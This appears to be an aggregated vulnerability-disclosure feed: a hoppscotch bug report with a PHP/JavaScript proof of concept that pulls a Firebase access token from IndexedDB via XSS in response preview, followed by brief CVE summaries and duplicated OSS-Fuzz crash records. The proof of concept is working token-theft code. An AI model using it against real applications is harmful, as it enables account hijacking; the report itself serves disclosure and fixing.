hoppscotch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor

**Description**

Steal authorization token via xss and hijack attack

**Proof of Concept**

Using this attack , attacker can hijack account by stealing authorization header . I see there is team based collaboration exists ,so one user can hack other user account using this bug .

**STEP**

First host bellow php file in your webserver

    // cors2.php
    <?php
        if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
            header('Access-Control-Allow-Origin: *');
            header('Access-Control-Allow-Methods: POST, GET, DELETE, PUT, PATCH, OPTIONS');
            header('Access-Control-Allow-Headers: *');
            header('Access-Control-Max-Age: 1728000');
            header('Content-Length: 0');
            header('Content-Type: text/plain');
            die();
        }
    
        header('Access-Control-Allow-Origin: *');
        //header('Content-Type: application/json');
         header('Content-Type: text/html');
        //header("Location: http://mysite.com/cors.php");
     //   $ret = [
       //     'result' => 'OK',
        //];
       // print json_encode($ret);
        //echo "chut\"'><img src=x onerror=alert(document.cookie)>";
        echo '<script>//alert();
    var dbs=window.indexedDB.open("firebaseLocalStorageDb",1);
    dbs.onsuccess = function(event) {
      db = event.target.result;
      var tt=db.transaction(["firebaseLocalStorage"]).objectStore("firebaseLocalStorage")
    var tt2=tt.getAllKeys();
    //console.log(tt2)
     tt2.onsuccess=function(yy){
      keyss=yy.target.result[0];//alert(keyss)
      var mm=tt.get(keyss);//console.log(mm)
     mm.onsuccess=function(kk){
     var xx=kk.target.result.value.stsTokenManager.accessToken
      alert(xx)
      }
      }
    };
    </script>
             ';
    ?>
    
    

Lets your webserver url is http://mysite.com/cors2.php  
Now login to you account and fetch above url and preview the request and see xss is executed and it will fetch authorization token .

**VIDEO POC**

https://drive.google.com/file/d/1JLFiL0S9YLYjPNleoTOoQZQOylDfXfwn/view?usp=sharing

**SUGGESTED FIX**

When you previewing as html then render it in sandbox , so that it cant acccess authorization token . Simply create a div element with sandbox attribute and render the response there .

**Impact**

Full account hijack by stealing Authorization token

CVE-2022-0121: Exposure of Sensitive Information to an Unauthorized Actor in hoppscotch

Spinnaker is an open source, multi-cloud continuous delivery platform. A path traversal vulnerability was discovered in uses of TAR files by AppEngine for deployments. This uses a utility to extract files locally for deployment without validating the paths in that deployment don't override system files. This would allow an attacker to override files on the container, POTENTIALLY introducing a MITM type attack vector by replacing libraries or injecting wrapper files. Users are advised to update as soon as possible. For users unable to update disable Google AppEngine deployments and/or disable artifacts that provide TARs.

**Impact**

A path traversal vulnerability was discovered in uses of TAR files by AppEngine for deployments. This uses a utility to extract files locally for deployment without validating the paths in that deployment don't override system files. This would allow an attacker to override files on the container, POTENTIALLY introducing a MITM type attack vector by replacing libraries or injecting wrapper files.

**Patches**

Incoming...

**Workarounds**

Disable Google AppEngine deployments and/or disable artifacts that provide TARs.

**References**

To be updated. Reference examples:  
https://bugzilla.redhat.com/show\_bug.cgi?id=1584388

Code area (as of release 1.26):  
https://github.com/spinnaker/clouddriver/blob/release-1.26.x/clouddriver-appengine/src/main/java/com/netflix/spinnaker/clouddriver/appengine/artifacts/ArtifactUtils.java

**For more information**

Email security@spinnaker.io

CVE-2021-39143: Build software better, together

Foxit PDF Reader and PDF Editor before 11.1 on macOS allow remote attackers to execute arbitrary code via getURL in the JavaScript API.

CVE-2021-45980: Security Bulletins | Foxit Software

Invalid input sanitizing leads to reflected Cross Site Scripting (XSS) in ASUS RT-AC52U_B1 3.0.0.4.380.10931 can lead to a user session hijack.

Inga filer i den här mappen.Logga in för att lägga till filer i den här mappen

CVE-2021-46109: ASUS – Google Drive

The UpdraftPlus WordPress Backup Plugin WordPress plugin before 1.16.66 does not sanitise and escape the backup_timestamp and job_id parameter before outputting then back in admin pages, leading to Reflected Cross-Site Scripting issues

CVE-2021-25022: Changeset 2635585 for updraftplus – WordPress Plugin Repository

The OMGF | Host Google Fonts Locally WordPress plugin before 4.5.12 does not validate the cache directory setting, allowing high privilege users to use a path traversal vector and delete arbitrary folders when uninstalling the plugin

CVE-2021-25021

The CAOS | Host Google Analytics Locally WordPress plugin before 4.1.9 does not validate the cache directory setting, allowing high privilege users to use a path traversal vector and delete arbitrary folders when uninstalling the plugin

CVE-2021-25020

HarfBuzz 2.9.0 has an out-of-bounds write in hb_bit_set_invertible_t::set (called from hb_sparseset_t<hb_bit_set_invertible_t>::set and hb_set_copy).

id: OSV-2021-1159

summary: UNKNOWN WRITE in hb\_bit\_set\_invertible\_t::set

details: |

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=37425

\`\`\`

Crash type: UNKNOWN WRITE

Crash state:

hb\_bit\_set\_invertible\_t::set

hb\_sparseset\_t<hb\_bit\_set\_invertible\_t>::set

hb\_set\_copy

\`\`\`

modified: '2022-04-13T03:04:33.060992Z'

published: '2021-08-22T00:00:24.931714Z'

references:

\- type: REPORT

url: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=37425

affected:

\- package:

name: harfbuzz

ecosystem: OSS-Fuzz

ranges:

\- type: GIT

repo: https://github.com/harfbuzz/harfbuzz.git

events:

\- introduced: 48ad9eef1eb5e5226fcfdb86f3cf5be925456a57

\- fixed: d3e09bf4654fe5478b6dbf2b26ebab6271317d81

versions:

\- 2.9.0

ecosystem\_specific:

severity: HIGH

CVE-2021-45931: oss-fuzz-vulns/OSV-2021-1159.yaml at main · google/oss-fuzz-vulns

id: OSV-2021-1159

summary: UNKNOWN WRITE in hb\_bit\_set\_invertible\_t::set

details: |

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=37425

Crash type: UNKNOWN WRITE

Crash state:

hb\_bit\_set\_invertible\_t::set

hb\_sparseset\_t<hb\_bit\_set\_invertible\_t>::set

hb\_set\_copy

modified: '2021-08-22T00:00:24.932034Z'

published: '2021-08-22T00:00:24.931714Z'

references:

\- type: REPORT

url: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=37425

affected:

\- package:

name: harfbuzz

ecosystem: OSS-Fuzz

ranges:

\- type: GIT

repo: https://github.com/harfbuzz/harfbuzz.git

events:

\- introduced: 48ad9eef1eb5e5226fcfdb86f3cf5be925456a57

\- fixed: d3e09bf4654fe5478b6dbf2b26ebab6271317d81

versions:

\- 2.9.0

ecosystem\_specific:

severity: HIGH

wolfSSL wolfMQTT 1.9 has a heap-based buffer overflow in MqttClient_DecodePacket (called from MqttClient_HandlePacket and MqttClient_WaitType).

Permalink

Cannot retrieve contributors at this time

id: OSV-2021-1204

summary: Heap-buffer-overflow in MqttClient\_DecodePacket

details: |

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=38146

Crash type: Heap-buffer-overflow WRITE 1

Crash state:

MqttClient\_DecodePacket

MqttClient\_HandlePacket

MqttClient\_WaitType

modified: '2021-09-06T00:00:41.682546Z'

published: '2021-09-06T00:00:41.682340Z'

references:

\- type: REPORT

url: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=38146

affected:

\- package:

name: wolfmqtt

ecosystem: OSS-Fuzz

ranges:

\- type: GIT

repo: https://github.com/wolfSSL/wolfMQTT.git

events:

\- introduced: 237f693c5731dcbd6adc9de69d9f575421c4414e

\- fixed: 84d4b53122e0fa0280c7872350b89d5777dabbb2

versions:

\- v1.9

ecosystem\_specific:

severity: HIGH

Tag

#google